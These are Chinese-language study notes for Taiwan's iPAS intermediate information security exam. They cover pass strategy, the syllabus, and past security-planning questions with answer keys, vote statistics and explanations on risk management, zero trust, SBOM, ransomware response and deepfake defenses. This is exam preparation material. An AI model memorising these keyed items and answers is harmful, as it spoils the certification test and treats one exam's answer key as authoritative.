---
# System prepended metadata

title: iPAS 資通安全概論 114-2 中級 總複習班筆記

---

# iPAS 資通安全概論－考試應試策略

> **搭配筆記使用**
> - 初級：https://hackmd.io/@hiiii/BJYND6jE-g
> - 中級：https://hackmd.io/@hiiii/H1ZZ-8qBbx

> - 114-1 中級總複習班影片
https://youtube.com/playlist?list=PLr1HiXzr31qydTHDXfyc3lnHSKFG5lHGI&si=3ly5-x9GqAcl9Mfh

## 歷屆試題難度統計

| 試卷／難度 | 非常簡單 | 簡單 | 適中 | 困難 | 非常困難 |
|-----------|:------:|:---:|:---:|:---:|:------:|
| 114-2 規劃 | 17 | 12 | 8 | 3 | 0 |
| 114-2 防護 | 14 | 8 | 10 | 6 | 2 |

> 統計資料來源：阿摩線上測驗 yamol.tw
> - 114-2 規劃：https://app.yamol.tw/exam/130419
> - 114-2 防護：https://app.yamol.tw/exam/130418

---

## 本次考試通過比例

![image](https://hackmd.io/_uploads/SJ5LEhXcZx.png)
> 資料來源：[iPAS 資訊安全工程師能力鑑定公告]
---

## 考試大綱

### 初級

| 科目 | 評鑑主題 | 評鑑內容 |
|------|----------|----------|
| 1.資訊安全管理概論 | 資訊安全管理概念 | 資訊安全管理系統 |
| | | 相關法規概論與遵循 |
| | | 隱私權保護與智慧財產權 |
| | 資產與風險管理 | 資產分類分級與盤點 |
| | | 風險評鑑與風險處理 |
| | 存取控制、加解密與金鑰管理 | 存取控制與身份認證 |
| | | 加解密與金鑰生命週期 |
| | 事故管理與營運持續 | 事件與事故管理 |
| | | 備援與營運持續 |
| 2.資訊安全技術概論 | 網路與通訊安全 | 網路安全 |
| | | 通訊與行動安全 |
| | 作業系統與應用程式安全 | 作業系統安全 |
| | | 作業系統與應用程式（含資料庫與網頁）攻擊手法 |
| | | 程式與開發安全 |
| | 資安維運技術 | 惡意程式防護與弱點管理 |
| | | 資料安全及備份管理 |
| | | 日誌管理 |
| | 新興科技安全 | 新興科技資安議題（包含但不限於新型運算機制、新型連網架構、智慧化資料處理與虛實整合特性的技術應用之安全議題） |

### 中級

| 科目 | 評鑑主題 | 評鑑內容 |
|------|----------|----------|
| 1.資訊安全規劃實務 | 資訊安全管理系統 | 資訊安全管理系統建置實務與法規遵循 |
| | | 資安管理實務：存取控制、縱深防禦、職務區隔（SOD） |
| | | 安全架構規劃實務 |
| | 風險管理實務 | 風險分析與評估 |
| | | 風險處理實務 |
| 2.資訊安全防護實務 | 弱點、攻擊與防護實務 | 弱點、威脅分類與攻擊手法 |
| | | 防護與應變實務 |
| | 作業安全實務 | 安全維運 |
| | | 滲透測試、源碼測試、資安健診 |

---

## 考試策略：70 分過關思維

考試只需答對 **28 題（70 分）** 即可通過，不必追求全對當狀元。

### 題目難度五級分類

| 難度等級 | 特徵 | 策略 |
|---------|------|------|
| 非常簡單 | 不需資安知識、靠常識即可答對 | 顧穩，容許小失誤 |
| 簡單 | 具基本資安知識即可 | 顧穩，容許小失誤 |
| 適中 | 需具備部分進階概念 | 至少答對一半 |
| 困難 | 多屬法規與標準內容 | 盡力作答 |
| 非常困難 | 沒讀過通常難答對 | 盡力作答 |

### 過關數學（以 114-2 防護實務為例）

| 難度 | 題數 | 務實目標 | 預估得分 |
|------|:----:|---------|:--------:|
| 非常簡單 | 14 | 容許錯 1 題 | 13 |
| 簡單 | 8 | 容許錯 1 題 | 7 |
| 適中 | 10 | 答對一半 | 5 |
| 困難＋非常困難 | 6+2 | 撿 3 題 | 3 |
| **合計** | **40** | | **28 ✓** |

> 把「非常簡單」和「簡單」的 22 題**顧穩**，就已經拿到 20 分的底盤，剩下只需要從 18 題中再撿 8 題，壓力小非常多。

### 讀題與作答技巧

1. **先判斷題型與問法**：題幹是在問「最適切」或「最不適切」，是單選或複選，這會直接影響作答邏輯。
2. **圈出否定詞與絕對詞**：「不是」、「不得」、「全部」、「僅」、「只要」、「即可」等詞往往是陷阱所在。遇到絕對用語要提高警覺，只要能舉出合理反例即可刪除該選項。
3. **界定對象與適用法規**：公司所在地與市場範圍是關鍵。在歐洲則適用 GDPR，在臺灣則依個資法；公部門適用資通安全管理法及子法，上市上櫃公司依資通安全管控指引。民間單位承作公部門案件時，防護等級通常需一併延伸。
4. **注意時間點與目的**：區分尚未發生、正在發生、事後復原，對應預防、偵測、復原三階段。
5. **刪去法收尾**：先排除明顯錯誤的選項，通常會剩下兩個，這時比較誰更貼近題幹、誰更符合情境。切勿腦補題幹未提的內容，以題幹為核心依據，選出最符合題意、可驗證的答案。

### 名詞理解與關鍵字反應

關鍵名詞不需死背定義，但要能自圓其說、說出核心概念。機密性是「未授權者不得讀取」、完整性是「未授權者不得修改」、可用性是「需要時可正常使用」。對於具層級關係的角色，可用例子幫助理解，例如在人資系統中，資料擁有者為人資處處長負責權限規劃，資料管理者為資訊處負責維運與設定，資料使用者則依職責查詢資料。

同時要養成「**關鍵字 → 對應概念**」的快速聯想，看到關鍵字就能反射對應的知識點：

- **法規類**：信用卡 → PCI DSS、歐洲個資 → GDPR、醫療 → HIPAA、財務內控 → SOX、臺灣公部門 → 資通安全管理法
- **攻擊手法類**：使用者輸入未過濾 → Injection、頁面載入外部腳本 → XSS、偽造使用者請求 → CSRF、伺服器代發請求 → SSRF、反序列化物件 → Insecure Deserialization
- **防護技術類**：參數化查詢 → 防 SQL Injection、CSP → 防 XSS、CSRF Token → 防 CSRF、EDR → 端點偵測、SIEM → 日誌集中分析
- **框架與標準類**：六大功能（含治理） → NIST CSF 2.0、TTPs 知識庫 → MITRE ATT\&CK、風險管理流程 → ISO 27005/31000、AI 管理 → ISO 42001

用情境理解比背條文更有效，考場上反應速度也更快。

### 時間控管與檢查節奏

- 考試時可先徵得監試人員同意，在草稿紙上記下容易混淆的重點（例如防護等級、通報與復原時限）。
- 遇到難題先標記、先選直覺答案再往下，避免在單題上卡太久。
- **複選題注意**：複選題通常要全對才給分，握有約七成把握的選項就應勾選，不要因不確定而空著不選。複選題只選一個選項系統仍然可以送出，並不會提醒你。
- **交卷前必做檢查**：重新掃一遍否定詞是否看反；複選題逐項確認有無漏選；核對答案卡題號是否有漏填；確認整體思考邏輯一致。

> ![複選題作答提醒](https://hackmd.io/_uploads/HypbNPaKZx.png)
> 資料來源：[iPAS 資訊安全工程師能力鑑定公告](https://ipd.nat.gov.tw/ipas/certification/ISE/news/IPAS-d15fa06c46a340d6ac748afb3f45bd4c)

---
## 114-2 資訊安全規劃實務

### 非常簡單

**1. 公司取得應徵人員的個人資料時，下列何項行為違反個人資料保護法？**
(A) 說明取得資料之使用期限
(B) 請其放棄申請其個人資料複製本之權利
(C) 說明個人資料的使用對象
(D) 告知個人資料使用之方式

> **答案：B**
> 統計：A(0), B(66), C(0), D(2)
>
> 解析：依《個資法》第 3 條，當事人有查詢、閱覽、複製、補充、更正、刪除等權利，且這些權利不得預先拋棄。要求應徵者放棄複製本權利，等於剝奪法定權利，違法。其餘選項皆屬蒐集時應告知事項（第 8 條），屬正當作法。

**6.【題組 1】情境如下：**

> 一家被政府依《資通安全管理法》核定為「關鍵基礎設施提供者（Critical Infrastructure Provider）」的區域醫療中心，其資訊環境為混合雲架構。院內核心的「電子病歷系統(EHR)」部署於本地資料中心，而新推出的「遠距醫療諮詢平台」則採用雲端原生技術，並整合了第三方開發的預約排程模組。為提升效率，開發團隊被允許在配發的公務筆電上，使用生成式 AI 輔助開發。某日上午，資安監控中心（SOC）的 AI 驅動偵測系統發出警報，顯示 EHR 主機出現勒索軟體加密行為，同時發現攻擊源頭來自一台開發人員的筆電，該筆電因執行了含有惡意程式碼的 AI 輔助工具而遭入侵。

**身為該醫療中心的資安長(CISO)，為有效控制損害並避免攻擊者在混合雲環境內部橫向移動，下列何種安全架構規劃原則在此情境下最能發揮作用？**
(A) 強化邊界防火牆規則，嚴格過濾所有進出醫院網路的流量
(B) 導入零信任安全架構(Zero Trust Architecture, ZTA)，在內網實施微切分(Micro-segmentation)
(C) 要求所有員工每三十天更換一次高強度密碼，並進行資安教育訓練
(D) 集中所有伺服器日誌至本地的資安訊息與事件管理系統 (SIEM)進行分析

> **答案：B**
> 統計：A(4), B(60), C(2), D(2)
>
> 解析：混合雲環境防橫向移動，ZTA＋微切分是最直接對應的架構原則。A 只顧邊界屬傳統城堡思維、C 是人員管理非架構層面、D 是偵測分析而非存取控制。

**7.【題組 1】情境如下：**

> 一家被政府依《資通安全管理法》核定為「關鍵基礎設施提供者（Critical Infrastructure Provider）」的區域醫療中心，其資訊環境為混合雲架構。院內核心的「電子病歷系統(EHR)」部署於本地資料中心，而新推出的「遠距醫療諮詢平台」則採用雲端原生技術，並整合了第三方開發的預約排程模組。為提升效率，開發團隊被允許在配發的公務筆電上，使用生成式 AI 輔助開發。某日上午，資安監控中心（SOC）的 AI 驅動偵測系統發出警報，顯示 EHR 主機出現勒索軟體加密行為，同時發現攻擊源頭來自一台開發人員的筆電，該筆電因執行了含有惡意程式碼的 AI 輔助工具而遭入侵。

**在事件後的改善會議上，考量到醫院的預算限制與營運持續性，下列何項針對「供應鏈安全」的長期風險處理策略最為務實且具成本效益？**
(A) 要求所有第三方軟體供應商提供其產品的完整原始碼進行原碼掃描
(B) 建立軟體物料清單(Software Bill of Materials, SBOM) 管理機制，並導入工具持續監控已知漏洞
(C) 全面禁止使用任何開源軟體與第三方模組，所有系統均自行開發
(D) 要求第三方軟體供應商皆簽署最高額度資安保險

> **答案：B**
> 統計：A(11), B(56), C(0), D(0)
>
> 解析：SBOM 是目前供應鏈安全的主流務實做法，成本可控且能持續監控元件漏洞。A 要求完整原始碼不切實際、C 全面禁用開源更不現實、D 買保險是風險轉移非技術策略。11 人選 A 是想太理想化。

**10. 某企業為防止內部人員濫用權限，設計了資訊系統的權限分工制度，下列何項作法「最符合」職務區隔(Separation of Duties, SOD)之原則？**
(A) 系統管理員擁有新增、查詢、刪除與審核所有交易紀錄的權限
(B) 員工可依需求申請額外權限，經由直屬主管自動核准後立即生效
(C) 部門主管在系統中直接新增自己以及下屬之出勤與加班紀錄，並同時進行審核
(D) 資料輸入作業由 A 員工負責，資料審核與最終送出作業由 B 員工執行

> **答案：D**
> 統計：A(2), B(2), C(0), D(65)
>
> 解析：SOD 核心是「做事的人不能同時審核」。D 將輸入與審核分給不同人，標準 SOD 設計。A 一人擁有所有權限、B 自動核准無實質審核、C 自己新增自己審核，全都違反 SOD。

**11. 一間跨國製造企業正在評估如何處理量子運算(Quantum Computing)對其現有資料加密儲存構成的長期風險，該企業儲存的設計圖與專利資料需保密數十年，考量到未來「先擷取後解密(Harvest Now, Decrypt Later)」的威脅，下列何種風險處理策略在當前最具前瞻性與成本效益考量？**
(A) 立即將所有加密系統升級為領導廠商宣稱的「抗量子」專有演算法
(B) 採取風險接受策略，認定量子運算在資料生命週期內不會成熟
(C) 啟動混合加密模式，同時使用傳統加密演算法與標準化的後量子密碼學(Post-Quantum Cryptography, PQC)演算法
(D) 將風險完全轉移，僅透過購買網路安全保險來應對未來可能的資料洩露

> **答案：C**
> 統計：A(0), B(5), C(57), D(2)
>
> 解析：混合加密模式（傳統＋PQC）是目前應對量子威脅最務實的過渡策略，兼顧前瞻性與成本。A 全面升級專有演算法不切實際且有供應商鎖定風險、B 風險接受太消極、D 僅買保險是風險轉移非技術對策。

**17. 參考美國國家標準研究院(NIST)與 ISO/IEC 62443 相關規範，營運技術(Operational Technology, OT)網路環境，包含製造業、醫療業等，在設計上的原則下列何者最為適切？**
(A) 要區隔資訊環境及作業環境
(B) 可以透過主機型防火牆做區隔
(C) 可以共用同一台目錄服務跟檔案伺服器
(D) OT 環境比較封閉可以不用更新軟體弱點

> **答案：A**
> 統計：A(60), B(2), C(0), D(0)
>
> 解析：IEC 62443 的核心原則就是 IT/OT 環境要區隔（Zone & Conduit 模型）。B 主機型防火牆在 OT 環境不適用（老舊設備無法安裝）、C 共用 AD 在 OT 環境是大忌（攻擊橫向移動風險）、D OT 也需要更新只是策略與頻率不同。

**18. 某業者近期頻繁遭受勒索軟體攻擊，其攻擊路徑多數是透過員工端點電腦感染後擴散，在強化端點安全防護時，除了傳統防毒軟體外，可評估導入下列何種技術以有效偵測並阻擋未知勒索軟體行為？**
(A) 加強網路層防火牆規則設定
(B) 於核心網路部署入侵偵測系統(Intrusion Detection System, IDS)
(C) 導入端點偵測與回應(Endpoint Detection & Response, EDR)解決方案
(D) 導入增強寫入過濾器(Enhanced Write Filter, EWF)等系統保護機制

> **答案：C**
> 統計：A(3), B(6), C(56), D(3)
>
> 解析：題目問「端點」層級、能「偵測並阻擋」未知勒索軟體，EDR 完全符合。A 防火牆是網路層、B IDS 只偵測不阻擋且在網路層、D EWF 是寫入保護機制（常用於 Kiosk/ATM），不是偵測技術。

**21.【題組 3】情境如下：**

> 某上市公司因覺得國內市場飽和，同時考量降低生產成本，以求增加其產品的競爭力與組織獲利，故公司國內於南部設有公司總部，並於附近有一生產基地，另於東南亞 V 國有一生產基地，並於美國及歐洲有營業據點，以擴展公司的業務。

**公司於國內希望統一控管對外連線，所有的網際網路流量可以被監控，下列何項方案最「不」適切？**
(A) 於總部及生產基地各自佈署防火牆並集中管理規則與日誌
(B) 總部及生產基地各自租賃網際網路服務存取網際網路直接對外連線
(C) 租用專線(Leased Line)連接總部與生產基地，對外連線統一從總部出口
(D) 生產基地透過站台對站台虛擬私人網路(Site-to-Site VPN)，將流量全部導向公司總部

> **答案：B**
> 統計：A(2), B(56), C(5), D(3)
>
> 解析：題目要「統一控管、所有網際網路流量可被監控」，B 讓各據點各自直連網際網路，流量無法集中監控，完全違背需求。A 集中管理防火牆可行、C 專線統一出口可行、D S2S VPN 導回總部可行。

**25. 請參閱附圖作答，一組織的系統開發單位進行資安風險評鑑前，將釐清所有資通系統與組織業務二者間的關聯性，以作為資安風險管理之範疇與邊界，在定義範疇與邊界時，應考量之因素包含附圖中的哪些事項？**

> 附圖內容：
> 1. 組織架構、營運目標、策略及政策
> 2. 適用之法令、法規及契約要求
> 3. 組織整體風險管理作法
> 4. 系統管理者的期望
> 5. 組織內資訊及資通系統資產及相對應之控制措施

(A) 2、3
(B) 2、4、5
(C) 1、2、3、5
(D) 1、3、4、5

> **答案：C**
> 統計：A(1), B(0), C(58), D(4)
>
> 解析：第 4 項「系統管理者的期望」不是風險評鑑範圍的標準考量因素，應考量的是更廣泛的利害關係人需求。1 組織架構策略、2 法規契約、3 整體風險管理、5 資產與控制措施都是標準考量要素。

**26. 有關風險評鑑流程(風險識別、風險分析、風險評估)的描述，下列何者最為適切？**
(A) 組織在識別風險時，若風險來源不可控制，可不予考量
(B) 風險分析係評估事件發生之可能性與影響，且該事件僅有單一來源、單一後果
(C) 風險評估是將風險分析結果與組織的風險準則比較，以決定哪些風險需採取額外的控制措施
(D) 組織決策時無法完整納入利害關係人意見，因此僅須由適當層級決議確認風險評估結果

> **答案：C**
> 統計：A(0), B(1), C(57), D(2)
>
> 解析：C 是 ISO 27005/ISO 31000 對「風險評估（Risk Evaluation）」的標準定義：將風險分析結果與風險準則比較，判斷是否需要額外處理措施。A 不可控風險仍需識別（可透過轉移、接受等方式處理）；B 一個事件可有多來源多後果，非單一；D ISO 31000 強調利害關係人溝通及諮詢貫穿整個流程，非僅由適當層級決議。

**27. 在當前地緣政治衝突加劇的背景下，一家位於關鍵基礎設施領域(如電力、水利)的國營企業，下列何種攻擊的威脅最為巨大？**
(A) 具備國家背景支持、以癱瘓或情蒐為目的的進階持續性威脅(Advanced Persistent Threat, APT)組織
(B) 為了政治訴求而進行網路塗鴉的駭客行動主義者 (Hacktivist)
(C) 尋找並回報漏洞以獲取獎金的白帽駭客
(D) 以竊取個人資料在暗網販售為目的的普通網路罪犯

> **答案：A**
> 統計：A(64), B(0), C(0), D(0)
>
> 解析：「地緣政治」＋「國營」＋「關鍵基礎設施」三個關鍵字直接指向國家級 APT。APT 具高度資源與長期潛伏能力，目標就是關鍵基礎設施的情蒐與破壞（如 Volt Typhoon 針對美國基礎設施、Sandworm 攻擊烏克蘭電網）。B Hacktivist 技術能力不如國家級 APT、C 白帽是幫忙找漏洞的、D 一般網路罪犯目標是獲利。

**30.【題組 4】情境如圖所示，XYZ 公司將導入資訊安全管理系統 (Information Security Management System, ISMS)標準，依循 ISO 27005 及 ISO 31000 進行風險管理時，各項風險管理作業逐層彙要列示如：【1.風險回應、2.建立全景、3.風險分析及評估、4.風險識別、5.風險評鑑、6.風險處理、7.記錄及報告】。**

![題組4情境圖](https://hackmd.io/_uploads/SJyRjSaKbx.png)

**依 XYZ 科技的資訊安全委員會在評量資安策略及資安管理架構時，請問下列何項資安管理範疇設定描述最「不」適切？**
(A) 包含有形與無形的資訊資產、人員、營運流程皆應納入風險評鑑項目之中
(B) 針對供應商資安作業，可於合約要求蒐集必要的保密協議及資訊安全事項，並遵循公司資訊安全政策
(C) 產品不屬資訊資產不需列入資安風險評鑑項目之中，應由產品部門依循公司定訂的「產品安全開發生命週期 (Product Security Development Life Cycle, PSDLC)」程序操作即可
(D) 資訊安全管理應定期參考國際安全標準及銷售地之法律法規要求，並更新公司的相關管理辦法與程序

> **答案：C**
> 統計：A(2), B(0), C(60), D(2)
>
> 解析：「產品不屬資訊資產」這個前提就錯了。產品（尤其科技公司的產品）涉及軟體、韌體、資料處理，屬於資訊資產範疇，必須列入 ISMS 風險評鑑。PSDLC 是產品開發的安全流程，但不能取代組織層級的風險評鑑。A 有形無形資產全面納入正確、B 供應鏈安全要求合約保密與遵循資安政策正確（ISO 27001 附錄A）、D 定期參考國際標準更新管理辦法正確。

**33. 有關在選擇風險處理選項時可參考之因素，下列何項敘述「有誤」？**
(A) 應考量組織的目標來選擇風險處理選項
(B) 應考量組織的業務壓力來選擇風險處理選項
(C) 應考量組織所訂之風險準則來選擇風險處理選項
(D) 應考量組織可用資源來選擇風險處理選項

> **答案：B**
> 統計：A(1), B(59), C(3), D(0)
>
> 解析：依 ISO 27005/ISO 31000，選擇風險處理選項時應考量組織目標(A)、風險準則(C)、可用資源(D)等。「業務壓力」(B) 不是標準中列舉的參考因素，業務壓力可能導致便宜行事、降低防護標準，不應成為風險處理決策的考量依據。

**34. 有關風險處理的描述，下列何者最為適切？**
(A) 該資產的使用者，即為需決定風險處理方式的角色
(B) 資產擁有者不需要參與識別其資產相關聯之風險
(C) 風險評鑑進行完成後，再決定建立風險接受準則以進行後續風險處理
(D) 需考量風險評鑑的結果，由風險擁有者於風險處理的選項中，選擇適切之方式

> **答案：D**
> 統計：A(1), B(0), C(9), D(53)
>
> 解析：風險處理的決策權在「風險擁有者（Risk Owner）」，而非資產使用者。A 使用者沒有決策權；B 資產擁有者當然需要參與風險識別；C 風險接受準則應在風險評鑑「之前」就建立好（屬於建立全景階段），不是事後才決定。9 人選 C 是把流程順序搞反了。

**37.【題組 5】情境如下：2025 年 2 月時，A 公司及其關係企業遭受駭客組織發動的勒索攻擊。該攻擊發生於週末夜間，駭客成功潛入企業核心系統，刪除了所有備份，並聲稱竊取了 1TB 的機密資料。隔天清晨，企業官網首頁被竄改，發布了駭客的勒索訊息，要求在 24 小時內支付未公開的贖金，否則將外洩資料並損毀企業聲譽。此次攻擊事件對 A 公司造成重大損失，公司核心系統 ERP、CRM⋯等業務系統全面癱瘓，生產與供應鏈亦因而停擺。**

**駭客刪除備份後發佈勒索訊息，請問下列何項行為的描述最為適切？**
(A) 偽裝攻擊
(B) 服務阻斷
(C) 勒索攻擊
(D) 社交工程

> **答案：C**
> 統計：A(0), B(3), C(59), D(0)
>
> 解析：題幹描述的就是典型的勒索攻擊（Ransomware/Extortion）行為：加密或刪除資料→要求贖金→威脅外洩。A 偽裝攻擊指的是冒充身份；B 服務阻斷（DoS/DDoS）是癱瘓服務但不勒索；D 社交工程是操縱人心騙取資訊。3 人選 B 可能是看到「系統癱瘓」就聯想到 DoS，但根本原因是勒索不是阻斷。

**39.【題組 5】情境如下：2025 年 2 月時，A 公司及其關係企業遭受駭客組織發動的勒索攻擊。該攻擊發生於週末夜間，駭客成功潛入企業核心系統，刪除了所有備份，並聲稱竊取了 1TB 的機密資料。隔天清晨，企業官網首頁被竄改，發布了駭客的勒索訊息，要求在 24 小時內支付未公開的贖金，否則將外洩資料並損毀企業聲譽。此次攻擊事件對 A 公司造成重大損失，公司核心系統 ERP、CRM⋯等業務系統全面癱瘓，生產與供應鏈亦因而停擺。**

**若 A 公司未來購買資安保險是屬於下列何種風險處理？**
(A) 風險降低(Risk Reduction)
(B) 風險避免(Risk Avoidance)
(C) 風險接受(Risk Acceptance)
(D) 風險轉移(Risk Transfer)

> **答案：D**
> 統計：A(5), B(1), C(2), D(54)
>
> 解析：購買保險是標準的風險轉移（Risk Transfer）做法，將財務損失轉移給保險公司承擔。A 風險降低是增加控制措施；B 風險避免是不做該活動；C 風險接受是不處理。5 人選 A 可能誤以為買保險能「降低」風險，但保險不降低風險發生的機率或衝擊，只是轉移財務後果。

**40.【題組 5】情境如下：2025 年 2 月時，A 公司及其關係企業遭受駭客組織發動的勒索攻擊。該攻擊發生於週末夜間，駭客成功潛入企業核心系統，刪除了所有備份，並聲稱竊取了 1TB 的機密資料。隔天清晨，企業官網首頁被竄改，發布了駭客的勒索訊息，要求在 24 小時內支付未公開的贖金，否則將外洩資料並損毀企業聲譽。此次攻擊事件對 A 公司造成重大損失，公司核心系統 ERP、CRM⋯等業務系統全面癱瘓，生產與供應鏈亦因而停擺。**

**（複選）針對此事件，A 公司實施下列哪些的安全控制措施，可以協助有效降低風險？**
(A) 實施多層備份策略
(B) 使用零信任網路架構
(C) 將備份系統與主網分離
(D) 定期刪除備份檔案

> **答案：A, B, C**
> 統計：A(58), B(57), C(58), D(1)
>
> 解析：多層備份（A）確保不會被一次全刪（如 3-2-1 備份原則）；零信任架構（B）防止駭客在內網橫向移動到核心系統；備份與主網分離（C）確保攻擊者無法同時觸及生產環境與備份。D「定期刪除備份檔案」是反向操作，會讓情況更糟，駭客已經刪了備份造成災難，怎麼還能主動刪？

### 簡單

**2. 依據 ISO/IEC 27001:2022 之中，關於溝通與傳達的內容，組織應決定相關於資訊安全管理系統之內部及外部溝通或傳達的需要，「不」包括下列何項？**
(A) 溝通或傳達事項
(B) 溝通或傳達對象
(C) 溝通或傳達地點
(D) 溝通或傳達方式

> **答案：C**
> 統計：A(3), B(1), C(56), D(8)
>
> 解析：ISO 27001:2022 第 7.4 條規定組織應決定 ISMS 相關溝通需要，包括：溝通什麼（事項）、何時溝通、與誰溝通（對象）、如何溝通（方式）。沒有「地點」這個要素，故 C 為正確答案。

**5.【題組 1】情境如下：**

> 一家被政府依《資通安全管理法》核定為「關鍵基礎設施提供者（Critical Infrastructure Provider）」的區域醫療中心，其資訊環境為混合雲架構。院內核心的「電子病歷系統(EHR)」部署於本地資料中心，而新推出的「遠距醫療諮詢平台」則採用雲端原生技術，並整合了第三方開發的預約排程模組。為提升效率，開發團隊被允許在配發的公務筆電上，使用生成式 AI 輔助開發。某日上午，資安監控中心（SOC）的 AI 驅動偵測系統發出警報，顯示 EHR 主機出現勒索軟體加密行為，同時發現攻擊源頭來自一台開發人員的筆電，該筆電因執行了含有惡意程式碼的 AI 輔助工具而遭入侵。

**身為該醫療中心的資安長(CISO)，情境在發現勒索軟體活動的當下，根據台灣《資通安全管理法》的規定，您的團隊第一小時內最優先的法定應辦事項為下列何項？**
(A) 立即支付勒索贖金以最快速度回復系統，避免影響病患照護
(B) 全面斷開醫院對外網路，阻止威脅擴散並進行內部損害評估
(C) 依據事件分級，完成初步損害評估與判斷，並於一小時內通報主管機關
(D) 召集所有資訊人員，優先搶救被加密的電子病歷資料庫

> **答案：C**
> 統計：A(0), B(13), C(54), D(0)
>
> 解析：依《資通安全管理法》及施行細則，關鍵基礎設施提供者發現資安事件，法定第一優先是事件分級＋初步損害評估＋一小時內通報主管機關。A 付贖金違反原則、B 全面斷網非法定第一步、D 搶救資料也非法規優先要求。選 B 的人是以技術直覺作答，但題目問的是「法定應辦事項」。

**12.（複選）為了防禦日益逼真的深度偽造(Deepfake)攻擊，組織應採取結合技術與程序的綜合性防禦策略，下列哪些措施屬於此類策略？**
(A) 採用具備活體偵測(Liveness Detection)功能的生物辨識系統
(B) 建立一個獨立的、高可信度的通訊管道(如緊急聯繫群組)，用於驗證高風險指令
(C) 禁止所有員工使用社交媒體
(D) 針對財務、人事等敏感操作，實施職務區隔 (Segregation of Duties, SoD)與多重審批流程

> **答案：A, B, D**
> 統計：A(50), B(58), C(1), D(62)
>
> 解析：活體偵測（A）、獨立高可信度通訊管道驗證（B）、財務人事敏感操作的 SOD 多重審批（D）都是合理的防 Deepfake 措施。C「禁止所有員工使用社交媒體」太絕對且不務實，僅 1 人選。

**13.【題組 2】情境如下：**

> 近年來，人工智慧的應用有效的協助企業組織完成許多繁難的任務，節省大量的人力。然而，結合深度偽造技術（Deepfake）的語音與影像攻擊，使詐騙效果更高。攻擊者可精準模仿組織高層的聲音或影像，誘使受害者放下警戒，依指示行動，導致重大資安風險與營運損失。企業高層要求身為資安長的您規劃一系列的強化機制，以避免組織同仁受騙將公司的款項匯出造成組織的營運損失。
>
> 資安部門據此推動以下控制措施：
> (1) 阻擋存取深度偽造工具或相關不良內容網站的使用。
> (2) 企業導入影像辨識、聲音辨識或 AI 模組，增加深度偽造攻擊的防禦能力。
> (3) 教育員工辨識深度偽造攻擊（如假冒上司語音指令、影像假訊息等）。
> (4) 財務與會計系統導入多因子認證（Multi-Factor Authentication, MFA），以降低驗款人員身份遭到盜用。
> (5) 電子郵件系統強化安全性，導入電子郵件系統的資料儲存加密技術。
> (6) 加強職務區隔（Segregation of Duties, SoD）：超過一定金額的匯款額度需要經過主管覆核同意後始得匯款。
> (7) 採用專有視訊會議系統導入多因子認證，封鎖非公司認可的專有視訊會議系統開會。

**請問為了有效防範 AI 深度偽造技術的語音與影像攻擊，降低組織同仁受到詐騙將公司的款項匯出造成組織的營運損失，下列何項推動組合較為有效？**
(A) (2)(5)
(B) (1)(3)
(C) (6)(7)
(D) (4)(5)

> **答案：C**
> 統計：A(3), B(16), C(47), D(5)
>
> 解析：(6) 加強 SOD 匯款需主管覆核＋(7) 專有視訊系統多因子認證，直接對應「防止被假冒指令騙匯款」的場景。16 人選 B=(1)(3) 偏向教育預防端但對「款項匯出」場景不夠直接。

**15.【題組 2】情境如下：**

> 近年來，人工智慧的應用有效的協助企業組織完成許多繁難的任務，節省大量的人力。然而，結合深度偽造技術（Deepfake）的語音與影像攻擊，使詐騙效果更高。攻擊者可精準模仿組織高層的聲音或影像，誘使受害者放下警戒，依指示行動，導致重大資安風險與營運損失。企業高層要求身為資安長的您規劃一系列的強化機制，以避免組織同仁受騙將公司的款項匯出造成組織的營運損失。
>
> 資安部門據此推動以下控制措施：
> (1) 阻擋存取深度偽造工具或相關不良內容網站的使用。
> (2) 企業導入影像辨識、聲音辨識或 AI 模組，增加深度偽造攻擊的防禦能力。
> (3) 教育員工辨識深度偽造攻擊（如假冒上司語音指令、影像假訊息等）。
> (4) 財務與會計系統導入多因子認證（Multi-Factor Authentication, MFA），以降低驗款人員身份遭到盜用。
> (5) 電子郵件系統強化安全性，導入電子郵件系統的資料儲存加密技術。
> (6) 加強職務區隔（Segregation of Duties, SoD）：超過一定金額的匯款額度需要經過主管覆核同意後始得匯款。
> (7) 採用專有視訊會議系統導入多因子認證，封鎖非公司認可的專有視訊會議系統開會。

**資安長要求除了前述控制外，為了強化 AI 治理，導入 ISO 42001 人工智慧管理系統(Artificial Intelligence Management System, AIMS)，請問在導入 AIMS 過程中，下列何項組合與 AI 治理較具關聯？**
(A) (1)(5)
(B) (2)(3)
(C) (3)(4)
(D) (5)(6)

> **答案：B**
> 統計：A(3), B(54), C(7), D(4)
>
> 解析：ISO 42001 是 AI 管理系統標準，核心關注 AI 的開發、部署與治理。(2) 導入 AI 辨識模組＋(3) 教育員工辨識 AI 攻擊，都直接與 AI 治理相關。其餘組合涉及的措施（阻擋網站、MFA、加密、SOD）雖然是好的資安實務，但與 AI 治理的直接關聯較弱。

**16.【題組 2】情境如下：**

> 近年來，人工智慧的應用有效的協助企業組織完成許多繁難的任務，節省大量的人力。然而，結合深度偽造技術（Deepfake）的語音與影像攻擊，使詐騙效果更高。攻擊者可精準模仿組織高層的聲音或影像，誘使受害者放下警戒，依指示行動，導致重大資安風險與營運損失。企業高層要求身為資安長的您規劃一系列的強化機制，以避免組織同仁受騙將公司的款項匯出造成組織的營運損失。
>
> 資安部門據此推動以下控制措施：
> (1) 阻擋存取深度偽造工具或相關不良內容網站的使用。
> (2) 企業導入影像辨識、聲音辨識或 AI 模組，增加深度偽造攻擊的防禦能力。
> (3) 教育員工辨識深度偽造攻擊（如假冒上司語音指令、影像假訊息等）。
> (4) 財務與會計系統導入多因子認證（Multi-Factor Authentication, MFA），以降低驗款人員身份遭到盜用。
> (5) 電子郵件系統強化安全性，導入電子郵件系統的資料儲存加密技術。
> (6) 加強職務區隔（Segregation of Duties, SoD）：超過一定金額的匯款額度需要經過主管覆核同意後始得匯款。
> (7) 採用專有視訊會議系統導入多因子認證，封鎖非公司認可的專有視訊會議系統開會。

**（複選）在導入影像辨識、聲音辨識或 AI 模組，為了確保導入系統的可信任性(Trustworthiness)，應考量下列哪些項目？**
(A) AI 強韌度(AI Robustness)
(B) AI 可靠度(AI Reliability)
(C) AI 可控性(AI Controllability)
(D) AI 系統速度(AI System Speed)

> **答案：A, B, C**
> 統計：A(42), B(64), C(60), D(3)
>
> 解析：AI 可信任性(Trustworthiness)的核心面向包括強韌度(Robustness)、可靠度(Reliability)、可控性(Controllability)。D「系統速度」是效能指標，不屬於可信任性要素。

